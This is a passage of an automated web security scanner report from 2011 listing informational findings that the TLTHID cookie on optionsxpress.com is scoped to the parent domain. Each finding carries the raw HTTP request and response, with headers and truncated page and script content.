Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC

Response

HTTP/1.1 200 OK
Content-Length: 184
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AAB5420D4DEFA11E2D23D3B00A9C5FCC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:12 GMT

.PNG (binary image/png body, 184 bytes, ends with IEND; non-printable bytes omitted)

9.81. http://www.optionsxpress.com/images/welcome/home/log_out.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below, which is set even though the resource returns 404). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=B7B8CAE441A79F28A820CD92711B9316; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.82. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=33DB87124BC0F05E3333A1912CEC33AA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

GIF89a (binary image/gif body, 43 bytes, ends with the ";" trailer; non-printable bytes omitted)

9.83. http://www.optionsxpress.com/inc/css/fonts.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/fonts.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/fonts.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 26 Jan 2011 17:22:07 GMT
Accept-Ranges: bytes
ETag: "ddafed8e7dbdcb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D8D6708B4FD4951D7D49549B550A7D35; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT
Vary: Accept-Encoding
Content-Length: 398865

@font-face {
   font-family: 'Avenir';
   src: local('...'), url(data:font/ttf;charset=utf-8;base64,AAEAAAAQAQAABAAARkZUTVrKoYEAAAEMAAAAHEdERUYEHALoAAABKAAAAERPUy8ymFMrRAAAAWwAAABgY21hcJ+9QgQAAAHMAAAB0mN2
...[SNIP]...

9.84. http://www.optionsxpress.com/inc/css/nav.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/nav.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below, which is set even though the resource returns 404). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/nav.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=EF6A174C4F8A82EC6AAA8D88589E4FD2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.85. http://www.optionsxpress.com/inc/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/print.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/print.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 1497
Content-Type: text/css
Last-Modified: Fri, 05 Aug 2011 15:10:14 GMT
Accept-Ranges: bytes
ETag: "4e322dc78153cc1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=FBF0413E4A3D95D87425BCBE085769C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* -----------------------------------------------------------------------


Blueprint CSS Framework 1.0
http://blueprintcss.org

* Copyright (c) 2007-Present. See LICENSE for more info.

...[SNIP]...

9.86. http://www.optionsxpress.com/inc/css/screen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/screen.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Length: 12224
Content-Type: text/css
Last-Modified: Tue, 01 Feb 2011 15:47:27 GMT
Accept-Ranges: bytes
ETag: "a7cef15327c2cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DACC901F4112EE44A3EEF6BEA615CEAA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* -----------------------------------------------------------------------


Blueprint CSS Framework 1.0
http://blueprintcss.org

* Copyright (c) 2007-Present. See LICENSE for more info.
* See
...[SNIP]...

9.87. http://www.optionsxpress.com/inc/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/styles.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 82959
Content-Type: text/css
Last-Modified: Thu, 14 Apr 2011 20:28:55 GMT
Accept-Ranges: bytes
ETag: "56454d93e2facb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* CSS3 Fonts */
@import "/inc/css/fonts.css";
/* Blueprint CSS Framework */
@import "/inc/css/screen.css";
/* jQuery UI */
@import "/inc/css/ui.css";
/* Navigation Menu */
@import "/inc/css/na
...[SNIP]...

9.88. http://www.optionsxpress.com/inc/css/ui.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/css/ui.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/css/ui.css HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=7C8B1C7F4AFB6F7AAC1E08B8CCC82FA9

Response

HTTP/1.1 200 OK
Content-Length: 28631
Content-Type: text/css
Last-Modified: Tue, 12 Apr 2011 16:23:21 GMT
Accept-Ranges: bytes
ETag: "4985d1f02df9cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.ui-helper-hidden { display: none; }
.ui-helper-hidden-accessible { position: absolute !important; clip: rect(1px 1px 1px 1px); clip: rect(1px,1px,1px,1px); }
.ui-helper-reset { margin: 0; padding: 0;
...[SNIP]...

9.89. http://www.optionsxpress.com/inc/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1F7A609F4712C324D98618822A48CA7B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

9.90. http://www.optionsxpress.com/inc/js/library.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/library.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/library.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 248416
Content-Type: application/x-javascript
Last-Modified: Fri, 13 May 2011 19:11:26 GMT
Accept-Ranges: bytes
ETag: "0c3328ea111cc1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=160C0A0240749D5BBE2BCAB62A01C888; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*/
(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var
...[SNIP]...

9.91. http://www.optionsxpress.com/inc/js/stats.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/stats.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/stats.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 35213
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 16:30:04 GMT
Accept-Ranges: bytes
ETag: "0ce19b9f7eecb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8A1FAB14569D172B2EDD88EE7023B03; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

function omniAccount(){ // determines account numbers in omniture based on firm type
   switch(oxVars.firm) {
       case 'OX':
           oxVars.stat_account = 'oxpressprodus'; // oxpressdev
           break;
       case '
...[SNIP]...

9.92. http://www.optionsxpress.com/inc/js/xpress.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /inc/js/xpress.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/js/xpress.js HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTHID=AF390C804BE14C3A1579AEAAAD65A123; TLTSID=AF390C804BE14C3A1579AEAAAD65A123

Response

HTTP/1.1 200 OK
Content-Length: 15383
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 19:05:07 GMT
Accept-Ranges: bytes
ETag: "8033892bfc13cc1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=84BED26B483FAA99856E1BA65F2756BD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:38 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


// *********** Global Variables ***********
var oxVars            = {};
oxVars.cdn            = '';
oxVars.firm            = '';
oxVars.sessionID    = null;
// ********* END Global Variables *********

$(document).ready(o
...[SNIP]...

9.93. http://www.optionsxpress.com/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /index.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=107E93BD465512E40B5A70B74A34183A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:43 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.94. http://www.optionsxpress.com/our_products/futures.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/futures.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/futures.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17366
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=6440376E42918CD8B2CA6C93434774A7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.95. http://www.optionsxpress.com/our_products/more_choices.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/more_choices.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/more_choices.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15988
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D25B11E6448CFB6AF7D08BAD666AE1C0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.96. http://www.optionsxpress.com/our_products/options.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/options.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/options.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16905
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=F0AB4137413D5F1C754265B218B191B8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.97. http://www.optionsxpress.com/our_products/stocks.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /our_products/stocks.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our_products/stocks.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=61C1D4C340663C2F694DFDB17219CAA8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
